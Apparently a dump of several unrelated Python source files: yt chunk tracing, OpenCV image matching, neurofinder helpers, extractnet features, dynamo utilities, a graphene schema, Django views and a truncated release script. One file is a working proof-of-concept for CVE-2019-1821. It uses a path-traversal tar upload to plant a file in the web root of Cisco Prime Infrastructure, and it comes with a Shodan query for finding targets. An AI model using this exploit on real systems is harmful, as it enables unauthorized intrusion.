    print(f"{space}{len(dobj._current_chunk.objs)=} of type {set(type(_) for _ in dobj._current_chunk.objs)}")
# Let's look at what this looks like for chunking a data object. Note that
# what happens here is that we see the current_chunk for each subchunk.
reg = ds.r[0.1:0.2,0.1:0.2,0.1:0.2]
for i, chunk in enumerate(reg.chunks([], "io")):
    print()
    print(f" chunk {i}")
    # Inspect reg (the data object), not chunk: chunks() swaps
    # reg._current_chunk in place for each subchunk it yields.
    print_chunk_info(reg, 4)
# Let's try now what happens if we look at current chunk *after* we access a data field.
print_chunk_info(reg, 0)
# So what we see is that the result of _identify_base_chunk has been popped
# into the region as the _current_chunk.
#
# A lot of this happens in the `_chunked_read` function, which is a context
# manager that tracks objects and fields.
#
# It's a little tricky to instrument this because it's a context manager. But,
# if we instrument it with just a print statement, we can see when and how it's
# called.
#
# @contextmanager
# def _chunked_read(self, chunk):
# # There are several items that need to be swapped out
# # field_data, size, shape
# obj_field_data = []
# if hasattr(chunk, "objs"):
# for obj in chunk.objs:
# obj_field_data.append(obj.field_data)
# obj.field_data = YTFieldData()
# old_field_data, self.field_data = self.field_data, YTFieldData()
# old_chunk, self._current_chunk = self._current_chunk, chunk
# old_locked, self._locked = self._locked, False
# yield
# self.field_data = old_field_data
# self._current_chunk = old_chunk
# self._locked = old_locked
# if hasattr(chunk, "objs"):
# for obj in chunk.objs:
# obj.field_data = obj_field_data.pop(0)
levels = {'level': 0}  # dict rather than int so the nested closure can mutate it
def trace_chunked_read(func):
    """Wrap a context-manager factory (e.g. ``reg._chunked_read``) so each
    entry/exit is printed with its nesting depth.

    Note: the wrapper is assigned onto the *instance*, so when yt calls
    ``self._chunked_read(chunk)`` the chunk arrives here as ``self`` and is
    forwarded to the already-bound original method.
    """
    space = "  "
    @contextlib.contextmanager
    def _func(self, *args, **kwargs):
        levels['level'] += 1
        print(f"{space * levels['level']}Entering chunked_read at level {levels['level']}")
        # BUG FIX: func() already returns a context manager; it must be
        # *entered* (with-statement), not merely yielded, or the field-data
        # swap that _chunked_read performs never actually happens.
        with func(self, *args, **kwargs) as value:
            yield value
        print(f"{space * levels['level']}Exiting chunked_read from level {levels['level']}")
        levels['level'] -= 1
    return _func
reg = ds.r[0.1:0.2,0.1:0.2,0.1:0.2]
# Instrument the bound method by rebinding on the instance; the wrapper's
# `self` parameter therefore receives the chunk argument — TODO confirm
# this aliasing is intentional.
reg._chunked_read = trace_chunked_read(reg._chunked_read)
reg["density"]
for chunk_index, chunk in enumerate(reg.chunks([], "io")):
    field = reg["density"]
    print(f"{chunk_index=} with {field.size=}")
# We do this to demonstrate something that happens much more frequently in the context of
print("\n\nNow, we run it again, with a layered chunking.\n")
levels = defaultdict(lambda: 0)
for chunk in reg.chunks([], "all"):
for subchunk in reg.chunks([], "io"):
print(f"{chunk_index=} with {field.size=}")
# This doesn't prove that *much* except that we have a layered chunking system.
# What we want to take a look at is how the chunking process works.
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 19 23:27:24 2020
@author: dkloe
"""
import numpy as np
import cv2
from matplotlib import pyplot as plt
img1 = cv2.imread('T_sensor_right_up.png', 0) # query image, loaded grayscale
img2 = cv2.imread('Capture.png',0) # target image, loaded grayscale
# Initiate ORB detector (the original comment said SIFT, but ORB is used)
orb = cv2.ORB_create()
# find the keypoints and descriptors with ORB
kp1, des1 = orb.detectAndCompute(img1,None)
kp2, des2 = orb.detectAndCompute(img2,None)
# create BFMatcher object; Hamming distance suits ORB's binary descriptors
bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
# Match descriptors.
matches = bf.match(des1,des2)
# Sort them in the order of their distance.
matches = sorted(matches, key = lambda x:x.distance)
good_matches = matches[:10]
src_pts = np.float32([ kp1[m.queryIdx].pt for m in good_matches ]).reshape(-1,1,2)
dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good_matches ]).reshape(-1,1,2)
# NOTE(review): findHomography can return M=None/mask=None when estimation
# fails; the lines below would then raise — confirm inputs always match.
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)
matchesMask = mask.ravel().tolist()
h,w = img1.shape[:2]
# Corners of the query image, projected into the target image via M.
pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
dst = cv2.perspectiveTransform(pts,M)
dst += (w, 0) # adding offset so the box lands on img2's half of the side-by-side canvas
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
                   singlePointColor = None,
                   matchesMask = matchesMask, # draw only inliers
                   flags = 2)
img3 = cv2.drawMatches(img1,kp1,img2,kp2,good_matches, None,**draw_params)
# Draw bounding box in Red
img3 = cv2.polylines(img3, [np.int32(dst)], True, (0,0,255),3, cv2.LINE_AA)
cv2.imshow("result", img3)
cv2.waitKey()
# or another option for display output
#plt.imshow(img3, 'result'), plt.show()
from numpy import maximum, percentile, full, nan, where, tile, inf, isnan
from skimage.measure import regionprops
from neurofinder import match, centers, shapes
from regional import many
from extraction.model import ExtractionModel
from .utils import norm
from .CC import CC
def compare(model, modelReference, threshold):
    """
    Compare two extraction models.

    Parameters
    ----------
    model : ExtractionModel
        Model for comparison.
    modelReference : ExtractionModel
        Reference model to be compared to, can be ground truth.
    threshold : float
        Distance threshold for matching sources.
    """
    recall, precision = centers(modelReference.regions, model.regions, threshold)
    inclusion, exclusion = shapes(modelReference.regions, model.regions, threshold)
    # Harmonic mean of recall and precision (F1); guard the 0/0 case.
    if recall == 0 and precision == 0:
        combined = 0
    else:
        combined = 2 * (recall * precision) / (recall + precision)
    return {
        'count': model.regions.count,
        'combined': combined,
        'recall': recall,
        'precision': precision,
        'inclusion': inclusion,
        'exclusion': exclusion,
        'threshold': threshold,
    }
def overlay(model, image=None, compare=None, threshold=inf, correct=False):
    """
    Overlay regions onto reference image, with optional comparison regions.
    Parameters
    ----------
    model : ExtractionModel
    image : array-like, optional, default = None
        Base image, can provide a 2d array,
        if unspecified will be black.
    compare : ExtractionModel, default = None
        Regions to be compared to if provided.
    threshold : float, default = inf
        Distance threshold for matching sources.
    correct : bool, default = False
        If True and a comparison given will only show correct regions
    """
    if image is not None:
        # Normalise to [0, 1] when the image looks like raw intensity values.
        if image.max() > 1:
            im = norm(image)
        else:
            im = image
        size = im.shape
    else:
        # No base image: size a black canvas to fit all region bounding boxes.
        size = (max([r.bbox[2] for r in model.regions])+1, max([r.bbox[3] for r in model.regions])+1)
        if compare is not None:
            sizeCompare = (max([r.bbox[2] for r in compare.regions])+1, max([r.bbox[3] for r in compare.regions])+1)
            size = (maximum(size[0], sizeCompare[0]), maximum(size[1], sizeCompare[1]))
        im = full(size, 0.0)
    if compare is not None:
        # matches[i] is the index in compare.regions matched to model region
        # i (nan when unmatched); matchesCompare is the inverse mapping.
        matches = match(model.regions, compare.regions, threshold)
        matchesCompare = full(compare.regions.count,nan)
        for ii in where(~isnan(matches))[0]:
            # NOTE(review): matches holds floats, so this float-indexes the
            # array — relies on implicit integer conversion; confirm with the
            # numpy version in use.
            matchesCompare[matches[ii]] = ii
        # Green stroke: model regions that matched something in compare.
        if any(~isnan(matches)):
            hits = many([model.regions[i] for i in where(~isnan(matches))[0]])
            h = hits.mask(size, background='black', fill=None, stroke=[0, 0.7, 0])
        else:
            h = full((size[0], size[1], 3), 0.0)
        # Red stroke: unmatched model regions (false alarms).
        if any(isnan(matches)):
            falseAlarms = many([model.regions[i] for i in where(isnan(matches))[0]])
            fA = falseAlarms.mask(size, background='black', fill=None, stroke=[0.7, 0, 0])
        else:
            fA = full((size[0], size[1], 3), 0.0)
        # Blue stroke: compare regions that were matched (true positives).
        if any(~isnan(matchesCompare)):
            truePositives = many([compare.regions[i] for i in where(~isnan(matchesCompare))[0]])
            tP = truePositives.mask(size, background='black', fill=None, stroke=[0, 0, 0.7])
        else:
            tP = full((size[0], size[1], 3), 0.0)
        # Yellow stroke: compare regions nothing matched (misses).
        if any(isnan(matchesCompare)):
            misses = many([compare.regions[i] for i in where(isnan(matchesCompare))[0]])
            m = misses.mask(size, background='black', fill=None, stroke=[0.7, 0.7, 0])
        else:
            m = full((size[0], size[1], 3), 0.0)
        if correct:
            # Only the agreeing regions (true positives and hits).
            mask = maximum(tP, h)
        else:
            mask = maximum(maximum(maximum(tP, fA), h), m)
    else:
        mask = model.regions.mask(size, background='black', fill=None, stroke=[0, 0.7, 0])
    # Replicate the grayscale base into 3 channels, then overlay the strokes.
    base = tile(im,(3,1,1)).transpose(1,2,0)
    return maximum(base, mask)
def filter_shape(model, min_diameter=7, max_diameter=13, min_eccentricity=0.2):
    """
    Filter extraction model regions based on shape criterion.
    Parameters
    ----------
    model : ExtractionModel.
    min_diameter : float, default 7.
        Minimum allowed diameter of regions
    max_diameter : float, default 13.
        Maximum allowed diameter of regions
    min_eccentricity : float, default 0.2.
        Minimum allowed eccentricity of regions
    """
    def _passes(region):
        # Rasterise the region and measure it with skimage's regionprops.
        mask = region.mask(fill=[1, 1, 1], background=[0, 0, 0])[:, :, 0]
        props = regionprops(mask.astype('int'))[0]
        return (min_eccentricity < props.eccentricity
                and min_diameter < props.equivalent_diameter < max_diameter)
    return ExtractionModel([region for region in model.regions if _passes(region)])
|
import requests
import random
import string
# Vuln Base Info
def info():
    """Static metadata describing this vulnerability module (CVE-2019-1821)."""
    classification = {
        "cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "cvss-score": "",
        "cve-id": "CVE-2019-1821",
        "cwe-id": "CWE-20",
    }
    references = [
        "https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html",
        "https://nvd.nist.gov/vuln/detail/CVE-2019-1821",
    ]
    return {
        "author": "cckuailong",
        "name": '''Cisco Prime Infrastructure Unauthorized RCE''',
        "description": '''Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.''',
        "severity": "critical",
        "references": references,
        "classification": classification,
        "metadata": {
            "vuln-target": "",
            "shodan-query": '''http.title:"prime infrastructure"''',
        },
        "tags": ["cve", "cve2019", "rce", "fileupload", "unauth", "intrusive", "cisco"],
    }
# Vender Fingerprint
def fingerprint(url):
    # No fingerprint check implemented; always treat the target as a candidate.
    return True
# Proof of Concept
def poc(url):
    """Upload test.txt through the tar path-traversal, then fetch it back.

    Returns a dict that always contains 'success'; on success it also
    carries 'info' and 'payload'.
    """
    # Initialise 'success' up front so callers can rely on the key existing
    # even when the final status check simply does not trigger.
    result = {"success": False}
    # BUG FIX: gen_randstr requires a length argument; the original called it
    # with none, so poc() raised TypeError before sending any request.
    randstr = gen_randstr(10)
    try:
        url = format_url(url)
        path = """/servlet/UploadServlet"""
        method = "POST"
        data = """--871a4a346a547cf05cb83f57b9ebcb83
Content-Disposition: form-data; name="files"; filename="test.tar"
../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{randstr}
--871a4a346a547cf05cb83f57b9ebcb83--""".format(randstr=randstr)
        headers = {'Accept-Encoding': 'gzip, deflate', 'Primary-IP': '127.0.0.1', 'Filename': 'test.tar', 'Filesize': '10240', 'Compressed-Archive': 'false', 'Destination-Dir': 'tftpRoot', 'Filecount': '1', 'Content-Length': '269', 'Content-Type': 'multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83'}
        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
        # Fetch the file the traversal should have dropped into the web root;
        # finding our random marker proves arbitrary file write.
        path = """/test.txt"""
        method = "GET"
        data = """"""
        headers = {}
        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
        if resp1.status_code == 200 and randstr in resp1.text:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path
    except Exception:
        # Narrowed from a bare except: network errors/timeouts mean the
        # check failed, but KeyboardInterrupt/SystemExit still propagate.
        result["success"] = False
    return result
# Exploit, can be same with poc()
def exp(url):
    # Exploit entry point; identical to the proof-of-concept.
    return poc(url)
# Utils
def format_url(url):
    """Normalise a target URL: trim whitespace, default the scheme to
    http://, and drop any trailing slash."""
    cleaned = url.strip()
    if not cleaned.startswith(("http://", "https://")):
        cleaned = "http://" + cleaned
    return cleaned.rstrip("/")
def gen_randstr(length=10):
    """Return a random alphanumeric string of the given length.

    BUG FIX: a default length is provided because poc() calls this with no
    argument, and random.choices replaces random.sample so lengths beyond
    the 62-character alphabet work and characters may repeat.
    """
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
import re
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from extractnet.util import get_and_union_features
from sklearn.decomposition import PCA
class AuthorFeatures(BaseEstimator, TransformerMixin):
    """
    An sklearn-style transformer that takes an ordered sequence of ``Block`` objects
    and returns a 2D array of Author-based features, where each value can be varies
    """
    __name__ = 'author'
    # tokens that we search for in each block's CSS attribute
    # first 'id', then 'class'
    attribute_tags = (
        'div', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'html', 'p', 'span', 'table', 'author',
    )
    tag_attributes = (
        'rel', 'id', 'class', 'itemprop', 'content', 'name'
    )
    # BUG FIX: r'[author|name|publisher]' was a character class matching any
    # single one of those letters (or '|'); alternation of the whole words is
    # what a name/author attribute check needs.
    name_attributes = re.compile(r'author|name|publisher')

    def __init__(self, vectorizer, text_vectorizer,
                 features=('kohlschuetter', 'weninger', 'readability', 'css'),
                 pca_n_components=10
                 ):
        # Pre-fitted CSS and text vectorizers supplied by the caller.
        self.vectorizer = vectorizer
        self.text_vectorizer = text_vectorizer
        self.feature = get_and_union_features(features)
        self.pca = PCA(n_components=pca_n_components)

    def _stack_features(self, blocks, encoding='utf-8'):
        """Build the raw (pre-PCA) feature matrix and the dragnet features.

        Returns (feature_vecs, dragnet_feat); each row of feature_vecs is a
        block's handcrafted+TF-IDF features concatenated with that block's
        dragnet feature row.
        """
        dragnet_feat = self.feature.transform(blocks)
        feature_vecs = np.stack([
            np.concatenate((
                self.transform_block(block, idx, len(blocks), encoding=encoding),
                dragnet_feat[idx],
            ))
            for idx, block in enumerate(blocks)
        ])
        return feature_vecs, dragnet_feat

    def fit(self, blocks, y=None):
        """Fit the PCA used to compress all but the first 8 feature columns.

        BUG FIX: the original referenced ``dragnet_feat`` without ever
        computing it, so fit() raised NameError; the features are now built
        the same way fit_transform() builds them.
        """
        feature_vecs, _ = self._stack_features(blocks)
        self.pca.fit(feature_vecs[:, 8:])
        return self

    def fit_transform(self, blocks, y=None):
        """Fit the PCA and return the transformed feature matrix."""
        feature_vecs, dragnet_feat = self._stack_features(blocks)
        pca_feat = self.pca.fit_transform(feature_vecs[:, 8:])
        feature_vecs = np.concatenate([feature_vecs[:, :8], pca_feat], 1)
        return np.concatenate([feature_vecs, dragnet_feat], 1)

    def transform_block(self, block, block_pos, total_blocks, encoding='utf-8'):
        """Compute the feature vector for one block.

        Layout: 9 handcrafted features, then text TF-IDF, then CSS TF-IDF.
        """
        css_text = ''
        other_text = ''
        if b'css' in block.css:
            css_text += block.css[b'css'].decode(encoding) + ' '
        if b'id' in block.css:
            css_text += block.css[b'id'].decode(encoding) + ' '
        # CSS attribute TF-IDF features.
        features = self.vectorizer.transform([css_text + ' ' + other_text]).toarray().flatten()
        # Content text TF-IDF features.
        text_features = self.text_vectorizer.transform([block.text]).toarray().flatten()
        handcraft_features = [0, 0, 0, 0, 0, 0, 0, 0, 0]
        if 'author' in css_text.lower() or 'author' in other_text.lower():
            handcraft_features[0] = 1
        if b'block_start_element' in block.features:
            tag_type = block.features[b'block_start_element'].tag
            if tag_type in self.attribute_tags:
                handcraft_features[1] = self.attribute_tags.index(tag_type) + 1
        handcraft_features[2] = len(css_text + other_text)
        handcraft_features[3] = len(block.text)
        if self.name_attributes.search(css_text):
            handcraft_features[5] = 1
        if self.name_attributes.search(other_text):
            handcraft_features[4] = 1
        # NOTE(review): assumes text_density is never zero — confirm upstream.
        handcraft_features[6] = block.link_density / block.text_density
        handcraft_features[7] = block_pos / total_blocks
        handcraft_features[8] = total_blocks
        return np.concatenate((handcraft_features, text_features, features))

    def transform(self, blocks, y=None, encoding='utf-8'):
        """
        Transform an ordered of blocks into a 2D features matrix with
        shape (num blocks, num features).
        Args:
            blocks (List[Block]): as output by :class:`Blockifier.blockify`
            y (None): This isn't used, it's only here for API consistency.
        Returns:
            `np.ndarray`: 2D array of shape (num blocks, num CSS attributes),
                where values are either 0 or 1, indicating the absence or
                presence of a given token in a CSS attribute on a given block.
        """
        feature_vecs, dragnet_feat = self._stack_features(blocks, encoding=encoding)
        pca_feat = self.pca.transform(feature_vecs[:, 8:])
        feature_vecs = np.concatenate([feature_vecs[:, :8], pca_feat], 1)
        return np.concatenate([feature_vecs, dragnet_feat], 1)
|
""" Utility methods """
import calendar
from datetime import datetime
from dateutil.parser import parse
from dateutil.relativedelta import relativedelta
from dateutil.tz import tzlocal, tzutc
from decimal import Decimal
from dynamo3 import Binary
try:
    # Python 3.3+: shutil reports the terminal size directly.
    from shutil import get_terminal_size # pylint: disable=E0611
    def getmaxyx():
        """ Get the terminal height and width """
        size = get_terminal_size()
        # get_terminal_size returns (columns, lines); swap to (rows, cols).
        return size[1], size[0]
except ImportError:
    try:
        import os
        from fcntl import ioctl
        from termios import TIOCGWINSZ
        import struct
        def getmaxyx():
            """ Get the terminal height and width """
            try:
                # Environment overrides take precedence when present.
                return int(os.environ["LINES"]), int(os.environ["COLUMNS"])
            except KeyError:
                # Ask the kernel for the controlling terminal's window size.
                height, width = struct.unpack("hhhh", ioctl(0, TIOCGWINSZ, 8 * "\000"))[
                    0:2
                ]
                if not height or not width:
                    return 25, 80
                return height, width
    except ImportError:
        # Windows doesn't have fcntl or termios, so fall back to defaults.
        def getmaxyx():
            """ Get the terminal height and width """
            return 25, 80
def plural(value, append="s"):
""" Helper function for pluralizing text """
return "" if value == 1 else append
def unwrap(value):
    """Strip one leading and one trailing character (quote removal)."""
    return value[1:len(value) - 1]
def resolve(val):
    """ Convert a pyparsing value to the python type """
    # val is a pyparsing ParseResults; getName() identifies which grammar
    # rule matched so each branch can unwrap it appropriately.
    name = val.getName()
    if name == "number":
        try:
            return int(val.number)
        except ValueError:
            # Not an int; keep exact precision with Decimal rather than float.
            return Decimal(val.number)
    elif name == "str":
        return unwrap(val.str)
    elif name == "null":
        return None
    elif name == "binary":
        # Strip the b'...' literal wrapper before wrapping in dynamo3.Binary.
        return Binary(val.binary[2:-1])
    elif name == "set":
        if val.set == "()":
            return set()
        return set([resolve(v) for v in val.set])
    elif name == "bool":
        return val.bool == "TRUE"
    elif name == "list":
        # Recursively resolve each element.
        return [resolve(v) for v in val.list]
    elif name == "dict":
        dict_val = {}
        for k, v in val.dict:
            dict_val[resolve(k)] = resolve(v)
        return dict_val
    elif name == "ts_function":
        # Timestamp helpers evaluate to a datetime; convert to epoch seconds.
        return dt_to_ts(eval_function(val.ts_function))
    elif name == "ts_expression":
        return dt_to_ts(eval_expression(val))
    else:
        raise SyntaxError("Unable to resolve value '%s'" % val)
def dt_to_ts(value):
    """Convert a datetime to a UTC epoch timestamp (float with sub-second
    precision); any non-datetime value passes through unchanged."""
    if isinstance(value, datetime):
        seconds = calendar.timegm(value.utctimetuple())
        return seconds + value.microsecond / 1000000.0
    return value
def eval_function(value):
    """ Evaluate a timestamp function """
    # value is (NAME, arg0, arg1, ...) from the parser.
    name, args = value[0], value[1:]
    if name == "NOW":
        return datetime.utcnow().replace(tzinfo=tzutc())
    elif name in ["TIMESTAMP", "TS"]:
        # Quoted timestamp string interpreted in the local timezone.
        return parse(unwrap(args[0])).replace(tzinfo=tzlocal())
    elif name in ["UTCTIMESTAMP", "UTCTS"]:
        # Same, but interpreted as UTC.
        return parse(unwrap(args[0])).replace(tzinfo=tzutc())
    elif name == "MS":
        # Convert a seconds value into milliseconds.
        return 1000 * resolve(args[0])
    else:
        raise SyntaxError("Unrecognized function %r" % name)
def eval_interval(interval):
    """ Evaluate an interval expression """
    # Map each grammar token name to its relativedelta kwarg and multiplier
    # (milliseconds are folded into microseconds).
    units = {
        "year": ("years", 1),
        "month": ("months", 1),
        "week": ("weeks", 1),
        "day": ("days", 1),
        "hour": ("hours", 1),
        "minute": ("minutes", 1),
        "second": ("seconds", 1),
        "millisecond": ("microseconds", 1000),
        "microsecond": ("microseconds", 1),
    }
    kwargs = {
        "years": 0,
        "months": 0,
        "weeks": 0,
        "days": 0,
        "hours": 0,
        "minutes": 0,
        "seconds": 0,
        "microseconds": 0,
    }
    # The first element is the INTERVAL keyword itself; the rest are units.
    for section in interval[1:]:
        name = section.getName()
        if name not in units:
            raise SyntaxError("Unrecognized interval type %r: %s" % (name, section))
        key, factor = units[name]
        kwargs[key] += factor * int(section[0])
    return relativedelta(**kwargs)
def eval_expression(value):
    """ Evaluate a full time expression """
    # Shape: (ts_function, operator, interval).
    expr = value.ts_expression
    start = eval_function(expr[0])
    op = expr[1]
    interval = eval_interval(expr[2])
    if op == "+":
        return start + interval
    if op == "-":
        return start - interval
    raise SyntaxError("Unrecognized operator %r" % op)
|
import graphene
from graphene import relay
from rx import Observable
from channels import Group
from products.schemas import ProductNode
from products.models import Product
from graphene_django.filter import DjangoFilterConnectionField
def make_sub(info, gid):
    """Resolve a relay global id, register the websocket's reply channel in
    the instance's update Group, and return a one-item iterator over the
    instance.
    """
    inst = relay.Node.get_node_from_global_id(info, gid)
    print("Instancia", inst)
    try:
        gp_name = 'gqp.{0}-updated.{1}'.format(str.lower(inst.__class__.__name__), inst.pk)
        Group(gp_name).add(info.context.reply_channel)
        info.context.channel_session['Groups'] = ','.join(
            (gp_name, info.context.channel_session['Groups']))
    except Exception:
        # Best effort: subscription bookkeeping is optional (e.g. when there
        # is no channel session). Narrowed from a bare except so
        # KeyboardInterrupt/SystemExit are not swallowed.
        pass
    return iter([inst])
class Query(graphene.ObjectType):
    """Root GraphQL query: hello probe plus product lookups."""
    hello = graphene.String()
    # NOTE(review): `relay.node.Field` (lowercase module) is unusual — the
    # conventional spelling is relay.Node.Field; confirm this resolves.
    product = relay.node.Field(ProductNode, id=graphene.Int())
    products = DjangoFilterConnectionField(ProductNode)
    def resolve_hello(self, info, **kwargs):
        # Trivial liveness resolver.
        return 'world'
class Subscription(graphene.ObjectType):
    """Root GraphQL subscription: demo counter plus a product-update stream."""
    count_seconds = graphene.Int(up_to=graphene.Int())
    sub_product = graphene.Field(
        ProductNode, description='subscribe to updated product', id=graphene.Int())
    def resolve_count_seconds(root, info, up_to=5):
        # Emit 0, 1, 2, ... once per second until up_to is exceeded.
        return Observable.interval(1000)\
            .map(lambda i: "{0}".format(i))\
            .take_while(lambda i: int(i) <= up_to)
    def resolve_sub_product(root, info, *args, **kwargs):
        # Poll the product once per second and push it to the subscriber.
        id = kwargs.get('id')
        # print("KW", kwargs)
        # print("args", args)
        # product_object = Product.objects.get(pk=id)
        # gp_name = 'gqp.{0}-updated.{1}'.format(
        #     str.lower(product_object.__class__.__name__), product_object.pk)
        # print("gp_name", gp_name)
        # print("info", info.context.__dict__)
        # print("session", info.context.channel_session.__dict__)
        # # context = info.return_type
        # print("channel_layer", info.context.reply_channel.channel_layer.__dict__)
        # Group(gp_name).add(info.context.reply_channel)
        # channel_session = info.context.channel_session
        #
        # all_channels = [
        #     channel for channel in info.context.channel_layer.group_channels(gp_name)]
        # print("all_channels", all_channels)
        # info.context.channel_session.update(
        #     {'Groups': ','.join((gp_name, info.context.channel_session.get('Groups', '')))})
        # print("channel_session", channel_session.__dict__)
        def get_object(observer):
            # NOTE(review): `observer` is actually the interval tick value,
            # not an Rx observer — it is ignored on purpose.
            instance = Product.objects.get(pk=id)
            return instance
        return Observable.interval(1000) \
            .map(lambda s: get_object(s)) \
            .share()
        # .create(get_object) \
# .create(get_object) \
# Expose queries and subscriptions (no mutations) as the root schema.
schema = graphene.Schema(query=Query, subscription=Subscription)
|
from django import forms
from django.contrib.auth.models import User
from .models import Friend, RequestCall
class AddForm(forms.Form):
    """Form for sending a friend request by username."""
    # Single unlabelled text input; Bootstrap classes applied inline.
    uname = forms.CharField(label="",widget=forms.TextInput(attrs={'autofocus':'on','autocomplete':'off','class':'form-control','placeholder':'Username of your friend'}))
|
from django.http.response import JsonResponse
from django.utils.translation import gettext as _
from django.contrib.auth.decorators import login_required, permission_required
from datetime import datetime
from app.base_views import MyViewCreateUpdateDelete
from .forms import *
from .tables import *
from .filters import *
from .models import *
class TypeOfServiceView(MyViewCreateUpdateDelete):
    """Declarative CRUD view wiring for TypeOfService records."""
    model = TypeOfService
    form_class = TypeOfServiceForm
    form_prefix = "typeofserviceform"
    table_class = TypeOfServiceTable
    filter_class = TypeOfServiceFilter
    queryset = TypeOfService.objects.all()
    template_name = "type_of_service/view.html"
    page_title = _("Type Of Service")
    page_title_icon = "file_invoice"
    show_modal = False
class DomainView(MyViewCreateUpdateDelete):
    """CRUD view for Domain records."""

    model = Domain
    form_class = DomainForm
    form_prefix = "domainform"
    table_class = DomainTable
    filter_class = DomainFilter
    queryset = Domain.objects.all()
    template_name = "domain/view.html"
    page_title = _("Domain")
    page_title_icon = "file_invoice"
    show_modal = False

    def get_GET_data(self):
        """Treat an untouched date-mask filter value as "no filter"."""
        data = super().get_GET_data()
        if data.get('acquisition_date') == "__/__/____":
            data['acquisition_date'] = None
        return data

    def get_POST_data(self):
        """Normalize an untouched date mask in the form payload to None."""
        field = self.form_prefix + '-acquisition_date'
        data = super().get_POST_data()
        if data.get(field, "__/__/____") == "__/__/____":
            data[field] = None
        return data
class ContractView(MyViewCreateUpdateDelete):
    """CRUD view for Contract records."""

    model = Contract
    form_class = ContractForm
    form_prefix = "contractform"
    table_class = ContractTable
    filter_class = ContractFilter
    queryset = Contract.objects.all()
    template_name = "contract/view.html"
    page_title = _("Contract")
    page_title_icon = "file_invoice"
    show_modal = False

    def get_GET_data(self):
        """Treat an untouched date-mask filter value as "no filter"."""
        data = super().get_GET_data()
        if data.get('start_date') == "__/__/____":
            data['start_date'] = None
        return data

    def get_POST_data(self):
        """Normalize an untouched date mask in the form payload to None."""
        field = self.form_prefix + '-start_date'
        data = super().get_POST_data()
        if data.get(field, "__/__/____") == "__/__/____":
            data[field] = None
        return data
class WebServiceView(MyViewCreateUpdateDelete):
    """Declarative CRUD view wiring for WebService records."""
    model = WebService
    form_class = WebServiceForm
    form_prefix = "webserviceform"
    table_class = WebServiceTable
    filter_class = WebServiceFilter
    queryset = WebService.objects.all()
    template_name = "webservice/view.html"
    page_title = _("Web Service")
    page_title_icon = "file_invoice"
    show_modal = False
@login_required
@permission_required('service.view_webservice')
def webservice_data_chart(request):
    """
    Return a JsonResponse with data to fulfill a chart.
    The return data consists in a series with all webservice divided by the type of service of the current year (divided by month).
    If a month has nothing, so it will be sent 0.
    Example:
    "series": [
        {
            "name": "type_of_service_name",
            "data": [9,9,9,9,9,9,0,0,0,0,0,0]  # 12 months of data
        },
        ...
    ],
    "labels": ["Jan", "Feb", "March",]
    """
    current_date = datetime.today()
    active_type_of_services = TypeOfService.objects.filter(active=True)
    months = list(range(1, 13))  # identity comprehension replaced (C416)
    data = {
        'series': [],
        # NOTE(review): `settings` is not imported explicitly here; it must
        # arrive through one of the star imports — confirm.
        'labels': settings.CHART_MONTHS_LABELS,
        'colors': [type_service.color for type_service in active_type_of_services]
    }
    for type_service in active_type_of_services:
        # One COUNT query per month; .values('id') keeps the query narrow.
        services_count = [
            WebService.objects.filter(
                date__month=month,
                date__year=current_date.year,
                type_of_service=type_service
            ).values('id').count()
            for month in months
        ]
        data['series'].append({
            "name": type_service.name,
            "data": services_count,
        })
    return JsonResponse(data)
@login_required
@permission_required('service.view_domain')
def domain_data_chart(request):
    """Return a JsonResponse with domain data to fulfill a chart.

    One series with 12 entries: domains acquired per month of the current
    year (0 for empty months).
    """
    current_date = datetime.today()
    months = list(range(1, 13))  # identity comprehension replaced (C416)
    data = {
        'series': [],
        'labels': settings.CHART_MONTHS_LABELS,
    }
    # One COUNT query per month of the current year.
    domain_count = [
        Domain.objects.filter(
            acquisition_date__month=month,
            acquisition_date__year=current_date.year,
        ).values('id').count()
        for month in months
    ]
    data['series'].append({
        "name": _("Domain"),
        "data": domain_count,
    })
    return JsonResponse(data)
@login_required
@permission_required('service.view_contract')
def contract_data_chart(request):
    """Return a JsonResponse with contract data to fulfill a chart.

    One series with 12 entries: contracts started per month of the current
    year (0 for empty months).
    """
    current_date = datetime.today()
    months = list(range(1, 13))  # identity comprehension replaced (C416)
    data = {
        'series': [],
        'labels': settings.CHART_MONTHS_LABELS,
    }
    # One COUNT query per month of the current year.
    contract_count = [
        Contract.objects.filter(
            start_date__month=month,
            start_date__year=current_date.year,
        ).values('id').count()
        for month in months
    ]
    data['series'].append({
        "name": _("Contract"),
        "data": contract_count,
    })
    return JsonResponse(data)
|
#!/usr/bin/env python3
import pytest
import json
import os
# git-python seems buggy (repo got corrupted) and hard to use,
# so git is driven through shell commands below.
version_file = "./static/swagger.json"
# don't actually execute shell commands if True (prints them only)
DRY_RUN=False
# wrap os.system
def shell(cmd):
    """Echo *cmd*, run it via os.system, and raise on a non-zero exit.

    Honors the module-level DRY_RUN flag: when set, the command is only
    printed, never executed.
    """
    print(cmd)
    if DRY_RUN: return
    status = os.system(cmd)
    if status != 0:
        raise SystemError("'%s' returned %d" % (cmd, status))
# 0. warn if local modifications.
#    BUG FIX: `[[ ]]` is a bashism; os.system runs /bin/sh (often dash),
#    where it fails — use the POSIX test builtin instead.
shell("[ -z \"$(git status -s)\" ] || echo 'WARNING: found modified/untracked files'")
# 1. ensure tests run ok
assert pytest.main() == pytest.ExitCode.OK
# 2. get current version from swagger
with open(version_file) as fp:
